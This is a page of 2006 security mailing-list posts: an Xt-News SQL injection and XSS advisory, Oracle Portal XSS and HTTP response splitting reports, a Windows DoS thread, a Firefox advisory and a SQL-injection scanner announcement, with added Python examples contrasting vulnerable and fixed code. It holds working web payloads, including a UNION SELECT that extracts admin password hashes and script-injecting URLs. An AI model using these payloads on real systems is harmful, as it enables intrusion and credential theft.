Xt-News 0.1 : SQL Injection Vulnerability XSS

2006-12-22 Thread mr_kaliman
Xt-News 0.1
---
Vendor site: http://dreaxteam.free.fr/forums/
Product: Xt-News 0.1
Vulnerability: SQL Injection Vulnerability  XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 10/12/06
Public disclosure: 22/12/06
 
Description:

SQL Injection Vulnerability:
http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION]
http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1#


XSS:
http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS]
http://[victim]/[script_news_path]/add_comment.php?id_news=;<script>alert(document.cookie)</script>foo
 
http://[victim]/[script_news_path]/show_news.php?id_news=[XSS]
http://[victim]/[script_news_path]/show_news.php?id_news='<script>alert(document.cookie)</script>foo'


---
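Added example, not code from Xt-News or from the advisory's author: the vulnerable pattern that the UNION payload above implies (id_news pasted straight into the query text), run against a constructed SQLite copy of the two tables, beside the bound-parameter version that rejects it. The eleven column names of the news table, the sample rows and the md5 values are assumptions; SQLite has no MySQL-style `#` comment, so the payload here ends in `-- ` instead.

```python
"""Added example (not Xt-News code): the id_news UNION SELECT, worked end to
end against a constructed SQLite schema, plus the parameterised fix."""
import sqlite3

# Same shape as the advisory's payload; '#' swapped for SQLite's '-- '.
PAYLOAD = ("-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null "
           "FROM xtnews_users WHERE admin=1-- ")


def build_db():
    """Constructed sample data. The news table has eleven columns so that the
    eleven-expression UNION in the advisory lines up; names are assumed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE xtnews_news(id, titre, auteur, jour, texte,
                                 c6, c7, c8, c9, c10, c11);
        CREATE TABLE xtnews_users(id, user, mdp, admin);
        INSERT INTO xtnews_news VALUES(1, 'Hello', 'kali', '2006-12-22',
                                       'first post', 0, 0, 0, 0, 0, 0);
        -- md5('password') and md5('test'): constructed sample hashes
        INSERT INTO xtnews_users VALUES(1, 'admin',
            '5f4dcc3b5aa765d61d8327deb882cf99', 1);
        INSERT INTO xtnews_users VALUES(2, 'bob',
            '098f6bcd4621d373cade4e832627b4f6', 0);
    """)
    return db


def show_news_vulnerable(db, id_news):
    """Mirrors the flaw: the request parameter is concatenated into SQL text,
    so '-1' selects no real news row and the UNION supplies one instead."""
    sql = "SELECT * FROM xtnews_news WHERE id=" + id_news
    return db.execute(sql).fetchall()


def show_news_fixed(db, id_news):
    """Hardened: enforce the integer type, then bind the value. Binding alone
    would already compare the whole payload as one string and match nothing;
    the cast turns the attempt into an explicit error."""
    try:
        news_id = int(id_news)
    except ValueError:
        raise ValueError("id_news must be an integer") from None
    return db.execute("SELECT * FROM xtnews_news WHERE id=?",
                      (news_id,)).fetchall()


if __name__ == "__main__":
    conn = build_db()
    for row in show_news_vulnerable(conn, PAYLOAD):
        # The admin login lands in the title slot and the hash in the body slot,
        # which is exactly where show_news.php would render them.
        print("leaked:", row[1], row[4])
```

The UNION only works because the attacker matched the column count of the original SELECT (eleven here) and chose slots that the page actually displays; a mismatch gives a syntax error, which is also why `null` fillers are used.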


Re: Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-22 Thread Mike
Well, just a warning before running the proof of concept... Make sure to close and 
save useful stuff. It indeed works on XP SP2 and it will reboot your machine. 
I have to say, this would be a trick to exploit another program's message box, and 
what joy could you possibly get out of restarting someone's computer. I don't think 
there is a possibility for any code execution, as far as I've seen. Would be a nice 
S-Kiddy toy if you could do it remotely, but would also piss off a lot of people.


RE: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-22 Thread Michele Cicciotti
> Holy mackerel! Instances of this bug date back to 1999!

Different bug. That appears to be a trivial exhaustion of CSRSS worker threads 
through indiscriminate calls to MessageBox+MB_SERVICE_NOTIFICATION, which 
causes a DoS as no threads are available to serve kernel-mode requests from 
win32k, stalling GUI processes. I have done my fair share of CSRSS reversing in 
my better days, and I'm pretty sure that in Windows 2000 and later, a dedicated 
thread is used for such notifications, not just any thread, any time. Easily 
verifiable with local net sends and Spy++. It wasn't a bug either, more like 
a serious design flaw that ignored a very basic Win32 mantra (don't do GUI in 
a worker thread) - not at all like this double-free




rPSA-2006-0234-1 firefox

2006-12-22 Thread rPath Update Announcements
rPath Security Advisory: 2006-0234-1
Published: 2006-12-22
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
firefox=/[EMAIL PROTECTED]:devel//1/1.5.0.9-0.1-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6497
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6498
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6501
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6502
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6503
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6504
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6505
https://issues.rpath.com/browse/RPL-883

Description:
Previous versions of the firefox package are vulnerable to multiple
types of attacks, including one that enables an attacker to run
arbitrary attacker-provided executable code if JavaScript is enabled.


Oracle Applications/Portal 9i/10g Cross Site Scripting

2006-12-22 Thread putosoft softputo

Description
---
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the 
Oracle Portal. The following is one that you may find in any version:


http://target/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');//

The following code will be generated:

---SNIPPED---
<script language=javascript>
top.null = null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now', 'null');//.render(window);
</script>
---SNIPPED---

Solution


There is no solution. As a workaround, enable mod_security if it's not. 
Otherwise wait 6 months/1 year for a patch from Oracle Corp.


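Added example; not code from Xt-News, Oracle Portal or either poster. It contrasts the two reflection contexts on this page: an HTML body (the Xt-News add_comment.php / show_news.php id_news parameter) and a JavaScript identifier slot (the container_tabs.jsp tc parameter, which lands in `top.<tc>.render(window);`). The point is that the fix differs by context: HTML escaping stops the first but does nothing against the second. The page templates are assumptions.

```python
"""Added example (not Xt-News or Oracle Portal code): the same reflected value
in an HTML context and in a JavaScript context, insecure and fixed."""
import html
import json
import re

# Payload shapes taken from the two posts (tags were stripped in the archive).
HTML_PAYLOAD = "<script>alert(document.cookie)</script>foo"
JS_PAYLOAD = "null = null;alert(document.cookie)//"

_JS_IDENT = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*$")
_SCRIPT_TMPL = "<script language=javascript>\ntop.%s.render(window);\n</script>"


def html_context_vulnerable(id_news):
    """Echoes the parameter into HTML untouched (the Xt-News flaw)."""
    return "<p>Comments for news %s</p>" % id_news


def html_context_fixed(id_news):
    """HTML-escapes the value; '<' and '>' become entities and the tag dies."""
    return "<p>Comments for news %s</p>" % html.escape(id_news, quote=True)


def js_context_vulnerable(tc):
    """The container_tabs.jsp pattern from the post: tc becomes JS source."""
    return _SCRIPT_TMPL % tc


def js_context_html_escaped(tc):
    """Wrong fix: HTML escaping leaves ';', '(', ')', '.' and '/' alone, so
    the injected statement still executes inside the script block."""
    return _SCRIPT_TMPL % html.escape(tc, quote=True)


def js_context_fixed(tc):
    """Right fix for an identifier slot: accept only a JS identifier."""
    if not _JS_IDENT.match(tc):
        raise ValueError("tc is not a valid tab identifier")
    return _SCRIPT_TMPL % tc


def js_context_string_slot(tc):
    """If the value has to be data rather than a name: emit it as a JSON string
    literal and neutralise '</' so it cannot close the <script> element."""
    literal = json.dumps(tc).replace("</", "<\\/")
    return "<script language=javascript>\ntop[%s].render(window);\n</script>" % literal


if __name__ == "__main__":
    print(html_context_fixed(HTML_PAYLOAD))
    print(js_context_html_escaped(JS_PAYLOAD))   # still carries alert(...)
    print(js_context_string_slot("</script><script>alert(1)</script>"))
```

The second print is the one worth staring at: `html.escape` is the reflex fix for XSS, and here it changes nothing, because the Oracle payload needs no HTML metacharacters at all. Encode for the context you are writing into, or, for an identifier slot, whitelist.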




Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting

2006-12-22 Thread putosoft softputo




From: Brian Eaton [EMAIL PROTECTED]
To: putosoft softputo [EMAIL PROTECTED]
CC: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
Date: Wed, 20 Dec 2006 13:55:09 -0500

On 12/20/06, putosoft softputo [EMAIL PROTECTED] wrote:

Oracle Portal/Applications HTTP Response Splitting
--

Sample:

http://target/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E


So they let the URL specify the content-encoding?  They might be
vulnerable to XSS via UTF-7 as well.

Regards,
Brian


Yeah, it is.

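Added example; not Oracle Portal code. It models a page that copies the `enc` query parameter (calendar.jsp?enc=...) into the Content-Type charset, shows the CRLF in the posted sample splitting one response into two when parsed by Content-Length, and shows the UTF-7 angle Brian raises: once the charset is attacker-chosen, a body with no `<` byte in it decodes to `<script>`. The response layout, the charset allow-list and the sample body are assumptions; the injected header is written with a colon here so that a real client would honour it.

```python
"""Added example (not Oracle Portal code): header injection through an
attacker-chosen charset, the split it causes, the allow-list fix, and the
UTF-7 decoding that makes the charset itself an XSS vector."""
import re

BODY_INJECTED = "<script>alert('hi')</script>"
# Shape of the posted enc= value, URL-decoded, with a correct Content-Length.
ENC_PAYLOAD = ("iso-8859-1\r\nContent-Length: %d\r\n\r\n%s"
               % (len(BODY_INJECTED), BODY_INJECTED))

ALLOWED_CHARSETS = {"iso-8859-1", "utf-8"}   # assumed list; utf-7 is absent

# UTF-7 for <script>alert(1)</script>: every '<' and '>' is a +...- block.
UTF7_PAYLOAD = b"+ADw-script+AD4-alert(1)+ADw-/script+AD4-"


def build_response_vulnerable(enc, body="<html>calendar</html>"):
    """Header value copied verbatim from the query string."""
    return ("HTTP/1.1 200 OK\r\n"
            "Content-Type: text/html; charset=" + enc + "\r\n"
            "Content-Length: %d\r\n\r\n" % len(body) + body)


def build_response_fixed(enc, body="<html>calendar</html>"):
    """Accept only a known charset token; CRLF and utf-7 never reach a header."""
    if enc.lower() not in ALLOWED_CHARSETS:
        raise ValueError("unsupported charset")
    return build_response_vulnerable(enc.lower(), body)


def split_responses(raw):
    """Consume a byte stream the way a Content-Length-driven client or proxy
    does; returns a list of (header_block, body). Two entries means the
    second one can be cached or displayed under the attacker's terms."""
    out = []
    rest = raw
    while rest.strip():
        rest = rest.lstrip("\r\n")
        head, _, rest = rest.partition("\r\n\r\n")
        m = re.search(r"(?im)^Content-Length:\s*(\d+)\s*$", head)
        n = int(m.group(1)) if m else len(rest)
        out.append((head, rest[:n]))
        rest = rest[n:]
    return out


def utf7_decode(data):
    """What a browser does with the body once told charset=utf-7."""
    return data.decode("utf-7")


if __name__ == "__main__":
    for head, body in split_responses(build_response_vulnerable(ENC_PAYLOAD)):
        print(repr(head), "->", repr(body))
    print(utf7_decode(UTF7_PAYLOAD))
```

The UTF-7 case is why "strip CR and LF" is not a complete fix for this parameter: the value still has to be drawn from a list of charsets the application actually means to serve.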




SQID v0.2 - SQL Injection Digger.

2006-12-22 Thread contact
SQL injection digger is a command line program that looks for SQL
injections and common errors in websites. The current version looks for SQL 
injections and common errors in website URLs found by performing 
a Google search.

The use of the Google search SOAP API has been removed because keys are no 
longer being issued. Now it performs the search directly over the web.

Sqid can be downloaded from http://sqid.rubyforge.org.

--
MSG // http://www.metaeye.org